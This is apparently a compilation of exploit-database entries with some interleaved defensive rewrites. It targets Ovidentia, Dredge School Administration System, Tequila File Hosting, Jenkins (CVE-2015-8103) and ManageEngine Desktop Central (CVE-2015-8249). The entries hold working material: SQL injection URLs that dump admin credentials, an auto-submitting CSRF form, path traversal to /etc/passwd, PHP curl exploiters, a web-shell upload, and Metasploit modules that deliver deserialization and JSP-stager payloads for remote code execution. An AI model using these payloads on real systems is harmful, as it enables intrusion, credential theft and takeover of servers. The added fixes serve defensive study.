$catinfo = mysql_fetch_array($catresult);
$categoryname = $catinfo['name'];
$catparent = $catinfo['parentid'];
if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }

// if the category doesn't have a parent
if ($catparent == NULL) {
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}

// if the category DOES have a parent
} else {
$query = "select * from categories where id=".$catparent;
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_array($result);
$parentname = $info['name'];
if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }

if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
.$scrubparent."/\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
."\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
}

// Add a view to this article
$query = "select * from articleviews where articleid = ".$article;
$results = mysql_query($query,$connection) or die(mysql_error());
$viewinfo = mysql_fetch_array($results);
if ($viewinfo == NULL) {
$sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
$query = mysql_query($sql);
} else {
$totalviews = $viewinfo['views'];
$totalviews++;

$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
$query = mysql_query($sql);
}

if ($seourls == 1) { // With SEO URLS
$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
} else {
$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
}

// Setup all template variables for display
$articletemp->set("authorname", $authorname);
$articletemp->set("authorlink", $authorlink);
$articletemp->set("date", $artdate);
$articletemp->set("displaycat", $displaycat);
$articletemp->set("views", $totalviews);
$articletemp->set("title", $title);
$articletemp->set("body", $body);
$articletemp->set("gravatar", $gravatar);
$articletemp->set("resource", $resource);

// For the adcode
$query = "select * from adboxes where id=1;";
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_assoc($result);
$articletemp->set("250adcode", stripslashes($info['adcode']));

// Outputs the homepage template!

echo $articletemp->output();

//Displays the comments -- if admin has them enabled

if($sitecomments == 0) {
echo "<br/><h2>Comments</h2>";

require_once 'comments/classes/Comments.class.php';

/* Article ID which shows the comments */
$post_id = $article;

/* Level of hierarchy comments. Infinit if declared NULL */
$level = NULL;

/* Number of Supercomments (level 0) to display per page */
$supercomments_per_page = 10000;

/* Moderate comments? */
if ($commentmod == 0) {
$moderation = true;
} else {
$moderation = false;
}

# Setup db config array #
$db_config = array("db_name" => $db_name,
"db_user" => $dbusername,
"db_pass" => $dbpassword,
"db_host" => $server );

# Create Object of class comments
$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);

# Display comments #
echo $comments->getComments();
}

include('rightsidebar.php');
include('obinclude.php');

}

?>

#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################
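As an added example (not ArticleSetup's code), here is the article lookup from article.php rewritten so that the id is validated as a genuine integer and every query that embeds it uses a bound parameter. It assumes config.php provides a mysqli connection in $connection and the site URL in $siteurl, and the articleviews rewrite assumes articleid is that table's primary key. The point of the first function: is_numeric() accepts leading whitespace, decimals and exponent notation ("1e3"), so it only guarantees that PHP can read the value as some number, not that it is the integer the query expects; FILTER_VALIDATE_INT returns a real int or false.

```php
<?php
// Added example (not ArticleSetup's code): integer validation plus bound
// parameters for the queries in article.php. Assumes config.php provides a
// mysqli connection in $connection and the site URL in $siteurl.
declare(strict_types=1);

/**
 * Normalise the "id" request parameter to a positive integer, or null.
 * is_numeric() is too loose a gate: it accepts "1e3", " 1" and "1.5".
 * FILTER_VALIDATE_INT yields a real int or false.
 */
function article_id(array $get): ?int
{
    if (!isset($get['id']) || !is_string($get['id'])) {
        return null;
    }
    $id = filter_var($get['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Fetch a published article row, or null. The id travels as a bound value, never as SQL text. */
function load_article(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT * FROM articles WHERE status = 0 AND id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

/** One-row lookup for the author and category queries, keyed by integer id. */
function load_row_by_id(mysqli $db, string $table, int $id): ?array
{
    // Table names cannot be bound; restrict them to a fixed set instead.
    if (!in_array($table, ['authors', 'categories'], true)) {
        throw new InvalidArgumentException('unexpected table');
    }
    $stmt = $db->prepare("SELECT * FROM `$table` WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/**
 * Replace the select-then-insert/update view counter with one atomic statement
 * (assumes articleid is the primary key of articleviews).
 */
function bump_views(mysqli $db, int $id): void
{
    $stmt = $db->prepare(
        'INSERT INTO articleviews (articleid, views) VALUES (?, 1)
         ON DUPLICATE KEY UPDATE views = views + 1'
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->close();
}

// Usage, mirroring the control flow of the vulnerable script.
$id = article_id($_GET);
if ($id === null) {
    header('Location: ' . $siteurl);
    exit;                                   // the original redirects without exit
}
$articleinfo = load_article($connection, $id);
if ($articleinfo === null) {
    header('Location: ' . $siteurl);
    exit;
}
$authorinfo = load_row_by_id($connection, 'authors', (int) $articleinfo['authorid']);
$catinfo    = load_row_by_id($connection, 'categories', (int) $articleinfo['categoryid']);
bump_views($connection, $id);
```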
            
# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792

PoC1:

/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------

include $babInstallPath."admin/acl.php";

------------------------------------------------------

[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]

Description: The $babInstallPath-parameter isn't declared before include.
             So an attacker can execute evil-code 'bout this.



PoC2:

/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------

require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");

-------------------------------------------------------

[+]Sploit2: http://[s0me0ne]/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?

Description: The problem is the same as the first. -.-
             It's possible to compromise the system.

### The 27 years old, german hacker bd0rk ###

Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
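Both Ovidentia proofs of concept on this page (newsletter 2.2 above, bulletindoc 2.9 here) depend on the module script being requested directly while a request-supplied value stands in for $babInstallPath or $GLOBALS['babAddonPhpPath']; PHP's register_globals (removed in PHP 5.4) allowed exactly that. As an added example, not Ovidentia's code, the module entry point below refuses direct requests, derives its include paths from its own location, and reports the php.ini settings that turn such a variable into a remote include. The BAB_LOADED constant and the directory layout are assumptions.

```php
<?php
// Added example (not Ovidentia's code): a module entry point that cannot be
// driven by a request-supplied include path. BAB_LOADED and the directory
// layout are assumptions.
declare(strict_types=1);

/**
 * Interpreter settings that make the two PoCs reachable at all.
 * register_globals no longer exists on PHP >= 5.4 (ini_get() returns false);
 * allow_url_include must be Off for an "http://" argument to require to fail.
 */
function insecure_ini_settings(): array
{
    $bad = [];
    foreach (['register_globals', 'allow_url_include'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $bad[] = $key;
        }
    }
    return $bad;
}

foreach (insecure_ini_settings() as $key) {
    error_log("php.ini hardening: $key is enabled; set it to Off");
}

// 1. Refuse direct requests. The framework defines this constant before it
//    includes a module's programs/*.php; a direct hit on admin.php does not.
if (!defined('BAB_LOADED')) {
    http_response_code(403);
    exit('direct access not allowed');
}

// 2. Derive the paths from the script's own location. Nothing below reads a
//    global that a request could have populated, so "?babInstallPath=..." and
//    "?GLOBALS[babAddonPhpPath]=..." have nothing to overwrite.
$babAddonPhpPath = __DIR__ . '/';                 // <install>/addons/<module>/programs/
$babInstallPath  = dirname(__DIR__, 3) . '/';     // <install>/   (assumed layout)

require_once $babInstallPath . 'admin/acl.php';
require_once $babAddonPhpPath . 'fonctions.php';
```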
            
source: https://www.securityfocus.com/bid/64720/info
   
Dredge School Administration System is prone to the following security vulnerabilities:
   
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
   
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
   
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. 

II. Backup Download

##############
VULNERABILITY
##############

/Backup/processbackup.php (LINE: 89-93)

-----------------------------------------------------------------------------
    //save file
 // $handle = fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
  $handle = fopen('RecordManager.sql','w+');
  fwrite($handle,$return);
  fclose($handle);

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

1. Open http://www.example.com/DSM/Backup/processbackup.php
2. Opening the link produces RecordManager.sql
3. Download the backup from http://www.example.com/DSM/Backup/RecordManager.sql
            

[Change Password & Email Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://www.example.com/DSM/loader.php?load=account settings">
<input type="hidden" name="AccessCode" value="123456" />
<input type="hidden" name="ConfirmAccessCode" value="123456" />
<input type="hidden" name="Email" value="email@hotmail.com" />
<input type="hidden" name="MM_update" value="form2" />
</form>
</body>
</html>
            

<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/DSM/loader.php?load=data export send&tableid=3" class="button white">Export Accounts</a></label>
</html>
            


http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff

http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff

http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
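The three URLs above are instances of one defect: the Id value from the query string is pasted into a SELECT, so "null and 1=2 union select ..." empties the intended result set and appends rows from adminstaff in its place. The following is an added example, not code from Dredge School Administration System (whose source is not on the page) or from the SecurityFocus entry. It rebuilds the concatenating query beside its parameterised replacement on a constructed in-memory SQLite database; the table and column names adminstaff, username and AccessCode follow the URLs, while the session table's other columns and all row contents are constructed.

```python
import sqlite3

# Added example (not Dredge School code).  Column and table names adminstaff,
# username and AccessCode come from the page's URLs; everything else here is
# constructed so the two handlers can be run side by side.

# The exact ?Id= value from the page's editsession URL, with '+' decoded to spaces.
INJECTED_ID = "null and 1=2 union select username,2,3,4,AccessCode,6 from adminstaff"


def build_db():
    """In-memory SQLite holding the two tables the editsession query touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE adminstaff (username TEXT, AccessCode TEXT);
        INSERT INTO adminstaff VALUES ('admin', 'constructed-access-code');
        CREATE TABLE session (Id INTEGER, Name TEXT, Term TEXT, Room TEXT,
                              StartTime TEXT, EndTime TEXT);
        INSERT INTO session VALUES (1, 'Morning', 'T1', 'R1', '08:00', '12:00');
    """)
    return conn


def edit_session_vulnerable(conn, id_param):
    """String concatenation: whatever arrives in ?Id= becomes part of the SQL."""
    sql = ("SELECT Id, Name, Term, Room, StartTime, EndTime FROM session WHERE Id="
           + id_param)
    return conn.execute(sql).fetchall()


def edit_session_fixed(conn, id_param):
    """Type-check, then bind: the parameter can only ever be a value, never SQL."""
    try:
        session_id = int(id_param)
    except (TypeError, ValueError):
        return []          # a real handler would answer 400 Bad Request here
    sql = "SELECT Id, Name, Term, Room, StartTime, EndTime FROM session WHERE Id=?"
    return conn.execute(sql, (session_id,)).fetchall()


def compare(id_param):
    """Run both handlers on the same input; returns (vulnerable_rows, fixed_rows)."""
    conn = build_db()
    return edit_session_vulnerable(conn, id_param), edit_session_fixed(conn, id_param)


if __name__ == "__main__":
    for value in ("1", INJECTED_ID):
        vuln, fixed = compare(value)
        print(f"Id={value!r}")
        print("  concatenated :", vuln)
        print("  parameterised:", fixed)
```

With Id=1 both handlers return the session row; with the page's payload the concatenating handler returns the adminstaff username and AccessCode in the session's columns, while the bound version rejects the value before any SQL runs. The same change applies to the editterm and editclass queries, which differ only in column count.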
            
================================================================================
Tequila File Hosting Arbitrary File Download
================================================================================
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Date: 16/12/2015
# Author: Ashiyane Digital Security Team
# Version: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which
allows companies or individuals to upload, manage and share their
files online. It is studied in every feature and was produced with
attention to every detail.

# PoC :

# Download Config
http://localhost/tequila/download.php?filename=files/../include/php/constants.php&name=file.php

# Download passwd
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd


# (PHP Exploit):

	<?php
	// page : download.php
	echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
	echo "Discovered By Ehsan Hosseini\n\n\n";
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, "http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
	curl_setopt($ch, CURLOPT_HTTPGET, 1);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
	$buf = curl_exec ($ch);
	curl_close($ch);
	unset($ch);
	echo $buf;
	?>

# Vulnerable code:

	<?php
	//This script forces the download of the file

	//Retrieving the file name from the querystring
	//and the stepping stone path to the download folder
	$fn          = (isset($_GET['filename']) ? $_GET['filename'] : false);
	$file        = $fn;
	$sn          = (isset($_GET['name']) ? $_GET['name'] : false);
	$secure_name = $sn;

	//The only access check: "files/" must occur somewhere in the name.
	//A name such as files/../include/php/constants.php satisfies it.
	if (strpos($file, "files/") !== false) {
	    $checkdownload = "true";
	} else {
		$checkdownload = "false";
	}

	//Verify that the file exists
	if($checkdownload == "true"){
		if (!file_exists($file)) {
			//If not, show an error
			echo "The file does not exist!";
		} else {
			//If the file exists ...
			//Set the page headers to force the download of the file
			header("Cache-Control: public");
			header("Content-Description: File Transfer");
			header('Content-Type: application/zip');
			header("Content-Disposition: attachment; filename= " . $secure_name);
			header("Content-Transfer-Encoding: binary");
			header('Connection: Keep-Alive');
			header('Expires: 0');
			header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
			header('Pragma: public');
			//Read the contents of the file; nothing confirms it lies inside the download folder
			readfile($file);
			exit;
		}
	}
	?>

#######################################################################

================================================================================
Tequila File Hosting Unrestricted File Upload
================================================================================

# PoC :
First register on the site ===>
http://localhost/tequila/register.php

Next, use this exploit:

    <?php
    // page : upload.php
    $postData = array('folder' => '/username', 'file' => '@shell.php');
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
    $buf = curl_exec ($ch);
    curl_close($ch);
    unset($ch);
    echo $buf;
    ?>

or

    curl -i -F folder='/ehsann' -F file=@ehsan.png http://localhost/tequila/upload.php

Shell uploaded.

Path of shell : http://localhost/tequila/files/username/shell.php

#######################################################################

================================================================================
Tequila File Hosting Cross Site Scripting
================================================================================

# PoC :
http://localhost/files.php?folder="><script>alert('Ehsan')</script>
http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Jenkins CLI RMI Java Deserialization Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
        the Jenkins master, which allows remote arbitrary code execution. Authentication is not
        required to exploit this vulnerability.
      },
      'Author'         =>
          [
            'Christopher Frohoff', # Vulnerability discovery
            'Steve Breen',         # Public Exploit
            'Dev Mohanty',         # Metasploit module
            'Louis Sato',          # Metasploit
            'William Vu',          # Metasploit
            'juan vazquez',        # Metasploit
            'Wei Chen'             # Metasploit
          ],
      'License'        => MSF_LICENSE,
      'References'     =>
          [
            ['CVE', '2015-8103'],
            ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
            ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
            ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
            ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
          ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Jenkins 1.637', {} ]
        ],
      'DisclosureDate' => 'Nov 18 2015',
      'DefaultTarget' => 0))

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),
      OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
      Opt::RPORT('8080')
    ], self.class)
  end

  def exploit
    unless vulnerable?
      fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
    end
    invoke_remote_method(set_payload)
    invoke_remote_method(class_load_payload)
  end


  # This is from the HttpClient mixin. But since this module isn't actually exploiting
  # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &
  # conflicts). We do need #target_uri and #normalize_uri to properly normalize the path though.

  def target_uri
    begin
      # In case TARGETURI is empty, at least we default to '/'
      u = datastore['TARGETURI']
      u = "/" if u.nil? or u.empty?
      URI(u)
    rescue ::URI::InvalidURIError
      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
      raise Msf::OptionValidateError.new(['TARGETURI'])
    end
  end

  def normalize_uri(*strs)
    new_str = strs * "/"

    new_str = new_str.gsub!("//", "/") while new_str.index("//")

    # Makes sure there's a starting slash
    unless new_str[0,1] == '/'
      new_str = '/' + new_str
    end

    new_str
  end

  def check
    result = Exploit::CheckCode::Safe

    begin
      if vulnerable?
        result = Exploit::CheckCode::Vulnerable
      end
    rescue Msf::Exploit::Failed => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    end

    result
  end

  def vulnerable?
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path)
    })

    unless res
      fail_with(Failure::Unknown, 'The connection timed out.')
    end

    http_headers = res.headers

    unless http_headers['X-Jenkins-CLI-Port']
      vprint_error('The server does not have the CLI port that is needed for exploitation.')
      return false
    end

    if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637
      @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
      return true
    end

    false
  end

  # Connects to the server, creates a request, sends the request,
  # reads the response
  #
  # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
  #
  def send_request_cgi(opts={}, timeout = 20)
    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
      actual_timeout = datastore['HttpClientTimeout']
    else
      actual_timeout =  opts[:timeout] || timeout
    end

    begin
      c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
      c.connect
      r = c.request_cgi(opts)
      c.send_recv(r, actual_timeout)
    rescue ::Errno::EPIPE, ::Timeout::Error
      nil
    end
  end

  def invoke_remote_method(serialized_java_stream)
    begin
      socket = connect(true, {'RPORT' => @jenkins_cli_port})

      print_status 'Sending headers...'
      socket.put(read_bin_file('serialized_jenkins_header'))

      vprint_status(socket.recv(1024))
      vprint_status(socket.recv(1024))

      encoded_payload0 = read_bin_file('serialized_payload_header')
      encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
      encoded_payload2 = read_bin_file('serialized_payload_footer')

      encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
      print_status "Sending payload length: #{encoded_payload.length}"
      socket.put(encoded_payload)
    ensure
      disconnect(socket)
    end

  end

  def print_status(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  #
  # Serialized stream generated with:
  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
  #
  def set_payload
    stream = Rex::Java::Serialization::Model::Stream.new

    handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
    decoded = stream.decode(handle)
    handle.close

    inject_payload_into_stream(decoded).encode
  end

  #
  # Serialized stream generated with:
  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
  #
  def class_load_payload
    stream = Rex::Java::Serialization::Model::Stream.new
    handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
    decoded = stream.decode(handle)
    handle.close
    inject_class_loader_into_stream(decoded).encode
  end

  def inject_class_loader_into_stream(decoded)
    file_name_utf8 = get_array_chain(decoded)
                         .values[2]
                         .class_data[0]
                         .values[1]
                         .values[0]
                         .values[0]
                         .class_data[3]
    file_name_utf8.contents = get_random_file_name
    file_name_utf8.length = file_name_utf8.contents.length
    class_name_utf8 = get_array_chain(decoded)
                          .values[4]
                          .class_data[0]
                          .values[0]
    class_name_utf8.contents = 'metasploit.Payload'
    class_name_utf8.length = class_name_utf8.contents.length
    decoded
  end

  def get_random_file_name
    @random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
  end

  def inject_payload_into_stream(decoded)
    byte_array = get_array_chain(decoded)
                     .values[2]
                     .class_data
                     .last
    byte_array.values = payload.encoded.bytes
    file_name_utf8 = decoded.references[44].class_data[0]
    rnd_fname = get_random_file_name
    register_file_for_cleanup(rnd_fname)
    file_name_utf8.contents = rnd_fname
    file_name_utf8.length = file_name_utf8.contents.length
    decoded
  end

  def get_array_chain(decoded)
    object = decoded.contents[0]
    lazy_map = object.class_data[1].class_data[0]
    chained_transformer = lazy_map.class_data[0]
    chained_transformer.class_data[0]
  end

  def read_bin_file(bin_file_path)
    data = ''

    File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
      data = f.read
    end

    data
  end

end
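The module's vulnerable? method decides from two response headers: X-Jenkins carries the version and X-Jenkins-CLI-Port advertises the remoting port the deserialization payload is sent to. The following is an added example, not part of the Metasploit module, written for a defender inventorying their own Jenkins masters from already-captured response headers. It keeps the module's 1.637 threshold but compares versions as integer tuples instead of floats, so multi-component numbers are ordered correctly. The hostnames, header sets and port numbers below are constructed.

```python
import re

# Added example (not part of the Metasploit module above).  The threshold is
# the one the module's vulnerable? method uses: X-Jenkins <= 1.637 with an
# advertised X-Jenkins-CLI-Port.  All hosts and headers here are constructed.

MODULE_THRESHOLD = (1, 637)

SAMPLE_RESPONSES = {
    "ci-a.example.test": {"X-Jenkins": "1.637", "X-Jenkins-CLI-Port": "45821"},
    "ci-b.example.test": {"X-Jenkins": "1.640", "X-Jenkins-CLI-Port": "45821"},
    "ci-c.example.test": {"X-Jenkins": "1.620"},           # CLI port not advertised
    "www.example.test":  {"Server": "nginx"},              # not Jenkins at all
}


def parse_version(value):
    """'1.637' -> (1, 637); '1.625.2' -> (1, 625, 2); None if not a dotted number."""
    value = value.strip()
    if not re.fullmatch(r"\d+(\.\d+)*", value):
        return None
    return tuple(int(part) for part in value.split("."))


def assess_jenkins_headers(headers):
    """Classify one host from its HTTP response headers.

    'status' is one of: not-jenkins, cli-port-not-advertised, unknown-version,
    vulnerable, patched-or-newer.  'version' and 'cli_port' are filled in
    where the headers allow.
    """
    lower = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    version_raw = lower.get("x-jenkins")
    cli_port_raw = lower.get("x-jenkins-cli-port")
    result = {"status": "not-jenkins", "version": None, "cli_port": None}

    if version_raw is None:
        return result
    version = parse_version(version_raw)
    result["version"] = version
    if cli_port_raw is None:
        # The module gives up here too: without the CLI port there is nothing to talk to.
        result["status"] = "cli-port-not-advertised"
        return result
    result["cli_port"] = int(cli_port_raw) if cli_port_raw.strip().isdigit() else None
    if version is None:
        result["status"] = "unknown-version"
    elif version <= MODULE_THRESHOLD:
        result["status"] = "vulnerable"
    else:
        result["status"] = "patched-or-newer"
    return result


def inventory(responses):
    """hostname -> status for a batch of captured responses."""
    return {host: assess_jenkins_headers(h)["status"] for host, h in responses.items()}


if __name__ == "__main__":
    for host, status in inventory(SAMPLE_RESPONSES).items():
        print(f"{host:20} {status}")
```

One caveat the module shares: an LTS build such as 1.625.x orders below (1, 637) and is flagged here as well, so check LTS hosts against the Jenkins advisory linked in the module's references before treating the result as final. Hosts that still advertise X-Jenkins-CLI-Port after patching are worth a second look in their own right, since the remoting port is exactly what this class of bug reaches.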
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in ManageEngine Desktop Central 9. When
        uploading a 7z file, the FileUploadServlet class does not check the user-controlled
        ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to
        inject a null byte at the end of the value to create a malicious file with an arbitrary
        file type, and then place it under a directory that allows server-side scripts to run,
        which results in remote code execution under the context of SYSTEM.

        Please note that by default, some ManageEngine Desktop Central versions run on port 8020,
        but older ones run on port 8040. Also, using this exploit will leave debugging information
        produced by FileUploadServlet in file rdslog0.txt.

        This exploit was successfully tested on version 9, build 90109 and build 91084.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249' ],
          [ 'CVE', '2015-8249']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ManageEngine Desktop Central 9 on Windows', {} ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Dec 14 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
        Opt::RPORT(8020)
      ], self.class)
  end

  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def get_jsp_stager
    exe = generate_payload_exe(code: payload.encoded)
    jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    # pwd: C:\ManageEngine\DesktopCentral_Server\bin
    # targeted location: C:\ManageEngine\DesktopCentral_Server\webapps\DesktopCentral\jspf
    register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")

    {
      jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
      jsp_name:    jsp_fname
    }
